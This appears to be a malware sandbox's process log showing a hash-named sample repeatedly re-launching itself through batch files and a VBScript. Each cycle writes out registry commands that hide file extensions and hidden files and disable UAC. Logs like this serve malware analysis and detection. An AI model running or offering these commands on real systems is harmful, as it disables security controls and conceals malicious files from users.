C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nuAMcgQs.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sEsUkUYU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ySAIcMcY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GeMIowQc.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qYQcwAYU.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\puUIogsI.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\pOEIIEgQ.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XQkcEAkA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dOQQoYgw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZcQYAcoY.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YEwMEYco.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\aKAQUwws.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\yOEkkUoA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dYcMwMQw.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tQoUooUg.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XWcIwIAo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DskMwcMA.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ImgIokII.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KqkQgEgk.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iUMYwEEo.bat" "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe""

C:\Windows\SysWOW64\cscript.exe

cscript C:\Users\Admin\AppData\Local\Temp/file.vbs

C:\Windows\System32\mousocoreworker.exe

C:\Windows\System32\mousocoreworker.exe -Embedding

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN"

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN.exe

C:\Users\Admin\AppData\Local\Temp\7d24e0358eb5dc53edb222858d7b6ceff90d5dd7fa735f604637e385fd1c591bN

